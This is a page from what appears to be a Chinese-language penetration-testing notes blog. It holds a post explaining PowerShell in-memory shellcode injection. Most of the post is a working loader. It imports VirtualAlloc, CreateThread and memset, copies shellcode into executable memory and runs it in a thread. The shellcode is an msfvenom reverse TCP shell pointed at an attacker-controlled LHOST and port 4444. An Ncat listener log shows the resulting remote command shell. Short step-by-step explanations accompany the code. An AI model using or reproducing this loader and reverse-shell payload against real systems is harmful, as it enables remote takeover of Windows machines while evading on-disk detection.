

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon-light.ico">
  <link rel="icon" type="image/png" href="/img/favicon-light.ico">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
    <meta http-equiv="Content-Security-Policy" content="upgrade-insecure-requests">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="渗透测试笔记、日常问题记录">
  <meta name="author" content="Ayu">
  <meta name="keywords" content="">
  <title>PowerShell In-Memory Injection - Black Book</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.4.0/styles/dracula.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"0xhc.github.io","root":"/","version":"1.8.7","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"onlypost":false},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.3.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Ayu's Blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/assets/blog/84707606_p0.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="PowerShell In-Memory Injection">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2020-11-08 08:20" pubdate>
        2020年11月8日 早上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      527 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      8
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">PowerShell In-Memory Injection</h1>
            
            <div class="markdown-body">
              <p>PowerShell In-Memory Injection Notes</p>
<a id="more"></a>

<figure class="highlight powershell"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs powershell"><span class="hljs-variable">$code</span> = <span class="hljs-string">&#x27;</span><br><span class="hljs-string">[DllImport(&quot;kernel32.dll&quot;)]</span><br><span class="hljs-string">public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);</span><br><span class="hljs-string">[DllImport(&quot;kernel32.dll&quot;)]</span><br><span class="hljs-string">public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);</span><br><span class="hljs-string">[DllImport(&quot;msvcrt.dll&quot;)]</span><br><span class="hljs-string">public static extern IntPtr memset(IntPtr dest, uint src, uint count);&#x27;</span>;<br><span class="hljs-variable">$winFunc</span> = <span class="hljs-built_in">Add-Type</span> <span class="hljs-literal">-memberDefinition</span> <span class="hljs-variable">$code</span> <span class="hljs-literal">-Name</span> <span class="hljs-string">&quot;Win32&quot;</span> <span class="hljs-literal">-namespace</span> Win32Functions <span class="hljs-literal">-passthru</span>;<br><br>[<span class="hljs-built_in">Byte</span>[]];<br>[<span class="hljs-built_in">Byte</span>[]] <span class="hljs-variable">$shellcode</span> = <span class="hljs-string">&quot;msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.0.100 LPORT=4444 -f powershell&quot;</span><br><span class="hljs-comment"># [Byte[]] $shellcode = 0xfc,0x48,0x83,0xe4,...0x41,0x89,0xda,0xff,0xd5</span><br><br><span class="hljs-variable">$size</span> = <span class="hljs-number">0</span>x1000;<br><span class="hljs-keyword">if</span> (<span class="hljs-variable">$shellcode</span>.Length <span class="hljs-operator">-gt</span> <span class="hljs-number">0</span>x1000)<br>&#123;<br>    <span class="hljs-variable">$size</span> = <span class="hljs-variable">$shellcode</span>.Length<br>&#125;;<br><br><span class="hljs-variable">$x</span> = <span class="hljs-variable">$winFunc::VirtualAlloc</span>(<span class="hljs-number">0</span>, <span class="hljs-variable">$size</span>, <span class="hljs-number">0</span>x3000, <span class="hljs-number">0</span>x40);    <span class="hljs-comment"># return base address</span><br><br><span class="hljs-keyword">for</span> (<span class="hljs-variable">$i</span> = <span class="hljs-number">0</span>; <span class="hljs-variable">$i</span> <span class="hljs-operator">-le</span> (<span class="hljs-variable">$shellcode</span>.Length - <span class="hljs-number">1</span>); <span class="hljs-variable">$i</span>++)<br>&#123;<br>    <span class="hljs-variable">$winFunc::memset</span>([<span class="hljs-built_in">Int</span><span class="hljs-type">Ptr</span>](<span class="hljs-variable">$x</span>.ToInt64() + <span class="hljs-variable">$i</span>), <span class="hljs-variable">$shellcode</span>[<span class="hljs-variable">$i</span>], <span class="hljs-number">1</span>)   <span class="hljs-comment"># Put in buffer</span><br>&#125;;<br><br><span class="hljs-variable">$winFunc::CreateThread</span>(<span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-variable">$x</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>);<br><span class="hljs-keyword">for</span> (;;) <br>&#123; <br>    <span class="hljs-built_in">Start-sleep</span> <span class="hljs-number">60</span> <br>&#125;;<br></code></pre></div></td></tr></table></figure>
<br/>

<figure class="highlight powershell"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs powershell"><span class="hljs-variable">$code</span> = <span class="hljs-string">&#x27;</span><br><span class="hljs-string">[DllImport(&quot;kernel32.dll&quot;)]</span><br><span class="hljs-string">public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);</span><br><span class="hljs-string">[DllImport(&quot;kernel32.dll&quot;)]</span><br><span class="hljs-string">public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);</span><br><span class="hljs-string">[DllImport(&quot;msvcrt.dll&quot;)]</span><br><span class="hljs-string">public static extern IntPtr memset(IntPtr dest, uint src, uint count);&#x27;</span>;<br></code></pre></div></td></tr></table></figure>
<p>脚本首先从 <code>kernel32.dll</code> 导入 <code>VirtualAlloc</code> 和 <code>CreateThread</code>，以及从 <code>msvcrt.dll</code> 导入 <code>memset</code> </p>
<p>这些函数将允许我们分别分配内存，创建一个执行线程，以及向分配的内存写入任意数据。注意，这里是在当前进程(powerhell.exe)中分配内存和执行一个新线程，而不是远程进程</p>
<br/>

<figure class="highlight powershell"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs powershell">[<span class="hljs-built_in">Byte</span>[]];<br>[<span class="hljs-built_in">Byte</span>[]] <span class="hljs-variable">$shellcode</span> = <span class="hljs-string">&quot;shellcode&quot;</span><br><span class="hljs-comment"># [Byte[]] $shellcode = 0xfc,0x48,0x83,0xe4,...0x41,0x89,0xda,0xff,0xd5</span><br><br><span class="hljs-variable">$size</span> = <span class="hljs-number">0</span>x1000;<br><span class="hljs-keyword">if</span> (<span class="hljs-variable">$shellcode</span>.Length <span class="hljs-operator">-gt</span> <span class="hljs-number">0</span>x1000)<br>&#123;<br>    <span class="hljs-variable">$size</span> = <span class="hljs-variable">$shellcode</span>.Length<br>&#125;;<br><br><span class="hljs-variable">$x</span> = <span class="hljs-variable">$winFunc::VirtualAlloc</span>(<span class="hljs-number">0</span>, <span class="hljs-variable">$size</span>, <span class="hljs-number">0</span>x3000, <span class="hljs-number">0</span>x40);    <span class="hljs-comment"># return base address</span><br><br><span class="hljs-keyword">for</span> (<span class="hljs-variable">$i</span> = <span class="hljs-number">0</span>; <span class="hljs-variable">$i</span> <span class="hljs-operator">-le</span> (<span class="hljs-variable">$shellcode</span>.Length - <span class="hljs-number">1</span>); <span class="hljs-variable">$i</span>++)<br>&#123;<br>    <span class="hljs-variable">$winFunc::memset</span>([<span class="hljs-built_in">Int</span><span class="hljs-type">Ptr</span>](<span class="hljs-variable">$x</span>.ToInt64() + <span class="hljs-variable">$i</span>), <span class="hljs-variable">$shellcode</span>[<span class="hljs-variable">$i</span>], <span class="hljs-number">1</span>)   <span class="hljs-comment"># Put in buffer</span><br>&#125;;<br></code></pre></div></td></tr></table></figure>
<p>然后，脚本使用 <code>VirtualAlloc</code> 分配一个内存块，获取存储在 <code>$shellcode</code> 字节数组中的每个字节的有效载荷，并使用 <code>memset</code> 将其写入新分配的内存块中</p>
<br/>

<figure class="highlight powershell"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs powershell"><span class="hljs-variable">$winFunc::CreateThread</span>(<span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-variable">$x</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>, <span class="hljs-number">0</span>);<br><span class="hljs-keyword">for</span> (;;) <br>&#123; <br>    <span class="hljs-built_in">Start-sleep</span> <span class="hljs-number">60</span> <br>&#125;;<br></code></pre></div></td></tr></table></figure>
<p>作为最后一步，我们在内存中写入的 payload 会在一个单独的线程中使用 <code>CreateThread</code> 执行</p>
<br/>

<figure class="highlight powershell"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs powershell">Ncat: Version <span class="hljs-number">7.91</span> ( https://nmap.org/ncat )<br>Ncat: Listening on :::<span class="hljs-number">4444</span><br>Ncat: Listening on <span class="hljs-number">0.0</span>.<span class="hljs-number">0.0</span>:<span class="hljs-number">4444</span><br>Ncat: Connection from <span class="hljs-number">192.168</span>.<span class="hljs-number">0.106</span>.<br>Ncat: Connection from <span class="hljs-number">192.168</span>.<span class="hljs-number">0.106</span>:<span class="hljs-number">49889</span>.<br>Microsoft Windows [<span class="hljs-type">Version</span> <span class="hljs-number">10.0</span><span class="hljs-type">.19041.572</span>]<br>(c) <span class="hljs-number">2020</span> Microsoft Corporation. All rights reserved.<br><br>C:\Users\<span class="hljs-number">0</span>x20C&gt;whoami<br>whoami<br>desktop<span class="hljs-literal">-me4u4md</span>\<span class="hljs-number">0</span>x20c<br></code></pre></div></td></tr></table></figure>
            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E4%BF%A1%E6%81%AF%E5%AE%89%E5%85%A8/">信息安全</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/code-injection/">code injection</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2020/11/08/11_20_dll_hijacking_notes/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">DLL Hijacking</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2020/11/07/13_35_bypass_uac_fodhelper/">
                        <span class="hidden-mobile">Bypass UAC Fodhelper</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  

  
</footer>

<!-- SCRIPTS -->

  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.0/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.6/dist/clipboard.min.js" ></script>






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.11/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      var inputArea = document.querySelector("#local-search-input");
      inputArea.onclick = function () {
        searchFunc(path, 'local-search-input', 'local-search-result');
        this.onclick = null
      }
    })()
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>



</body>
</html>
